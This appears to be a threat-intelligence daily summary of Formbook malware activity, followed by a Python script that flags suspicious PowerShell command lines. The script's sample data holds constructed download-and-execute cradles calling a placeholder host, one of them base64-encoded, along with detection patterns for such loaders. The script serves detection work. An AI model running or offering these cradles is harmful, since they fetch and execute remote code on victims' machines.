Daily Summary
Formbook activity increased moderately on 2026-05-01, with 39 new samples detected against a 7-day average of 32, representing a 22% surge. This rise is driven predominantly by PowerShell-based loaders, which accounted for 26 of the 39 samples, signaling a tactical shift toward fileless execution.
New Samples Detected
PowerShell scripts (.ps1) dominated today’s intake at 66.7% (26 samples), followed by JavaScript (.js) with 6 samples (15.4%). Executables (.exe) and DLLs (.dll) each contributed 2 samples, while batch (.bat), command (.cmd), and VBScript (.vbe) files made up the remainder. The heavy reliance on .ps1 scripts suggests operators are moving away from traditional compiled binaries toward lightweight, easily obfuscated payloads that can be hosted on ephemeral paste sites or embedded in phishing lures.
Distribution Methods
Based on the file type distribution, Formbook is likely delivered through email phishing campaigns using compressed archives containing .ps1 or .js attachments. The .ps1 samples may leverage PowerShell’s built-in ability to download secondary payloads from remote servers, while .js files could be used in HTML smuggling or as initial droppers. The lone .vbe sample hints at occasional use of Visual Basic scripts, possibly from older or less sophisticated distribution chains.
Detection Rate
Given the prevalence of PowerShell and JavaScript variants, detection rates for traditional signature-based AV solutions may be lower than average. Formbook operators often employ code obfuscation and dynamic loading to bypass static analysis. SOC analysts should prioritize behavioral detection rules and command-line logging to catch execution chains initiated by these script-based loaders.
C2 Infrastructure
Fifty-five new C2 servers were observed today, a high count that aligns with the increased sample volume. These servers are likely short-lived and cycled frequently to evade blocklists. No geographic patterns were provided, but analysts should expect C2s to be hosted on residential proxies or compromised VPS providers to complicate takedown efforts.
7-Day Trend
Today’s 22% increase above the 7-day average reverses a slight downward trend earlier in the week. The shift toward script-based loaders may indicate a new campaign wave rather than organic growth, requiring close monitoring over the next 48 hours.
Security Analysis
The pivot to .ps1 and .js files at the expense of .exe and .dll payloads is a notable deviation from Formbook’s historical reliance on compiled binaries. This change likely reduces file size and improves stealth against network scanners that look for PE headers. One actionable recommendation: enable PowerShell script block logging and constrain the execution policy to signed scripts only, so that unauthorized .ps1 execution is blocked. Coupling this with user awareness training on macro and script attachments can cut initial infection chains significantly.
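As an added illustration of the command-line logging and behavioral detection recommended above (this code is not part of the summary or of any vendor tooling), the Python below scores process-creation command lines for PowerShell loader traits and unwraps -EncodedCommand payloads before scoring them. The sample command lines, the indicator names, the threshold and the example.invalid host are all constructed for the demonstration.

```python
import base64
import re

# Constructed process-creation command lines (the shape a parsed 4688 or
# Sysmon process-create event would carry); none come from real telemetry.
SAMPLE_COMMAND_LINES = [
    # Routine administrative use: a known script, no hiding, no downloads
    'powershell.exe -NoProfile -File C:\\Scripts\\inventory.ps1',
    # Loader-style: hidden window, policy bypass, download-and-execute cradle
    'powershell.exe -w hidden -ep bypass -c "IEX (New-Object Net.WebClient)'
    '.DownloadString(\'http://example.invalid/a.ps1\')"',
    # Loader-style: the same cradle hidden behind -EncodedCommand (UTF-16LE base64)
    'powershell.exe -NoP -NonI -EncodedCommand ' + base64.b64encode(
        "Invoke-Expression (New-Object Net.WebClient)"
        ".DownloadString('http://example.invalid/b.ps1')".encode('utf-16le')
    ).decode(),
]

# Behavioral indicators; each is weak alone, so we count how many co-occur.
INDICATORS = {
    'hidden_window': re.compile(r'-w(?:indowstyle)?\s+hidden', re.I),
    'policy_bypass': re.compile(r'-(?:ep|ex|exec|executionpolicy)\s+bypass', re.I),
    'download_cradle': re.compile(
        r'(DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient)', re.I),
    'dynamic_exec': re.compile(r'\b(IEX|Invoke-Expression)\b', re.I),
    'encoded_command': re.compile(
        r'-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})', re.I),
}


def decode_encoded_command(cmdline):
    """Return the plaintext of an -EncodedCommand argument, or None."""
    m = INDICATORS['encoded_command'].search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode('utf-16le')
    except (ValueError, UnicodeDecodeError):
        return None  # not valid base64/UTF-16LE; keep only the raw match


def score_command_line(cmdline):
    """Sorted list of indicator names that fire on the raw + decoded text."""
    decoded = decode_encoded_command(cmdline)
    text = cmdline + (' ' + decoded if decoded else '')
    return sorted(name for name, rx in INDICATORS.items() if rx.search(text))


def is_suspicious(cmdline, threshold=2):
    """Flag when at least `threshold` independent loader traits co-occur."""
    return len(score_command_line(cmdline)) >= threshold


if __name__ == '__main__':
    for line in SAMPLE_COMMAND_LINES:
        print(is_suspicious(line), score_command_line(line))
```

Script block logging (Event ID 4104) captures the decoded script body directly, so the same indicator set can be run over those events without the base64 unwrapping step.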